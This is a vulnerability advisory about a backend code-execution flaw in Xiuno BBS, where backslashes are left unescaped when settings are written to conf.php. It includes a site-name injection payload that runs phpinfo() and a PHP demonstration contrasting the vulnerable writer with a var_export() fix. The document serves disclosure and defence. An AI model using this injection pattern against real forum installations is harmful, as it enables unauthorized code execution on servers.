Xiuno BBS forum backend code execution (getshell) vulnerability, with exploitation method - Vulnerability Alert - Black Bar Safety Net

2013-04-24T00:00:00
ID MYHACK58:62201338477
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-04-24T00:00:00

Description

Official description:

The name Xiuno comes from Shura, the Aries Gold Saint in Saint Seiya, whose attack speed and fighting strength are the greatest of the zodiac; he is the incarnation of speed and power. In Buddhism, Asura (Shura) is one of the six realms, lying between the human and the heavenly realms: half human, half god, staunch in temperament and fond of battle. We take that meaning in the hope that XIUNO will grow ever stronger and ever faster.

From its first line of code, Xiuno BBS has grown to roughly 40,000 lines, the result of many years of pursuing performance to a harsh, perfectionist, almost obsessive degree; the author often fell into long deliberation over the trade-offs of a single design. On data sets of tens of millions of rows, end-to-end execution time is generally kept within 0.00x seconds, which the author is quite pleased with.

Vulnerability description:

The vulnerability is in the backend code that writes settings into the configuration file, and it leads to code execution:

1. The system configuration is not stored in the database but in conf.php;

2. It is stored as a PHP array;

3. Single quotes are escaped: ' => \';

4. The backslash \ itself is not escaped;

5. Inserting \' therefore produces \\' in the file. PHP reads \\ as a single literal backslash, so the quote that follows is no longer escaped (the escape has itself been escaped) and it closes the preceding array value;

6. The flaw appears in several places in the admin backend, including the Denglu (灯鹭) plugin settings.

In the on_base method of admin/control/conf_control.class.php:

The relevant code is omitted.

The values are written straight into the file. Because the filtering is not strict, we submit \' to get past the single-quote escaping and close the quoted value.

Settings -> Basic Settings -> Site name: append \',)&&phpinfo();/* (other fields should work as well; not tested)


This writes the following into conf/conf.php (the \' in the site name has become \\', which PHP reads as one backslash followed by a quote that closes the string, so everything after it is parsed as code):

    return array(
        ......
        // unique identifier
        'app_id' => 'bbs',
        // site name
        'app_name' => 'Xiuno BBS\\',)&&phpinfo();/*',
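The escaping flaw from items 3 to 5, modelled as an added example that is not Xiuno BBS code: a writer that escapes only the single quote (an assumption about the omitted on_base code, built from the description above, not the actual code), a hardened writer that uses var_export(), and a small reader that applies PHP's own single-quoted-string rules to show where each generated app_name value really ends. All function names are this example's own; it needs PHP 7.1 or later.

```php
<?php
// Added example (not Xiuno BBS code): a model of the escaping flaw described
// above, next to a safe way to write the same config file. The vulnerable
// writer is an assumption about the omitted on_base code, built from items
// 2 to 5 of the description; all function names are this example's own.

// Vulnerable pattern: only "'" is escaped, "\" is left alone. The input \'
// becomes \\' in the file, which PHP reads as one literal backslash followed
// by an unescaped quote that terminates the string.
function conf_to_php_vulnerable(array $conf): string
{
    $php = "<?php\nreturn array(\n";
    foreach ($conf as $key => $value) {
        $php .= "\t'" . $key . "' => '" . str_replace("'", "\\'", $value) . "',\n";
    }
    return $php . ");\n";
}

// Hardened: var_export() escapes both "\" and "'" and always emits a valid
// PHP literal. The equivalent manual fix is addcslashes($value, "\\'").
function conf_to_php_fixed(array $conf): string
{
    return "<?php\nreturn " . var_export($conf, true) . ";\n";
}

// Read a single-quoted PHP string literal whose opening quote is at $pos,
// applying PHP's own rules: inside '...' only \\ and \' are escapes, every
// other backslash is literal. Returns the decoded value and the text that
// follows the closing quote on the same line.
function read_single_quoted(string $php, int $pos): array
{
    if (($php[$pos] ?? '') !== "'") {
        throw new InvalidArgumentException("no opening quote at offset $pos");
    }
    $value = '';
    $len = strlen($php);
    for ($i = $pos + 1; $i < $len; $i++) {
        $c = $php[$i];
        if ($c === '\\' && $i + 1 < $len && ($php[$i + 1] === '\\' || $php[$i + 1] === "'")) {
            $value .= $php[++$i];           // \\ -> \   and   \' -> '
        } elseif ($c === "'") {
            $eol = strpos($php, "\n", $i);
            $end = $eol === false ? $len : $eol;
            return [$value, substr($php, $i + 1, $end - $i - 1)];
        } else {
            $value .= $c;
        }
    }
    throw new RuntimeException('unterminated single-quoted string');
}

// Find the app_name entry in a generated file and report what PHP would
// actually see: the decoded value and whatever is left over as code.
function inspect_app_name(string $php): array
{
    $key = strpos($php, "'app_name'");
    if ($key === false) {
        throw new RuntimeException('app_name not found');
    }
    $open = strpos($php, "'", $key + strlen("'app_name'"));
    [$value, $rest] = read_single_quoted($php, $open);
    return ['value' => $value, 'code_after_value' => $rest];
}

// The payload the advisory enters as the site name.
$payload = "Xiuno BBS\\',)&&phpinfo();/*";
$conf = ['app_id' => 'bbs', 'app_name' => $payload];

foreach (['vulnerable' => conf_to_php_vulnerable($conf),
          'fixed'      => conf_to_php_fixed($conf)] as $label => $php) {
    $seen = inspect_app_name($php);
    echo "== $label ==\n", $php, "\n";
    echo "decoded app_name:  ", $seen['value'], "\n";
    echo "left over as code: ", $seen['code_after_value'], "\n";
    echo "round-trips unchanged: ", ($seen['value'] === $payload ? 'yes' : 'no'), "\n\n";
}
```

Run it with `php example.php`. For the vulnerable writer the decoded app_name is `Xiuno BBS\` and `,)&&phpinfo();/*',` is left outside the literal, exactly the situation in the conf.php fragment above; for the var_export() writer the value round-trips unchanged and only the trailing comma follows the literal. The same fix (escape the backslash as well as the quote, or generate the literal with var_export()) applies to every admin field written this way, including the plugin settings the description lists.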
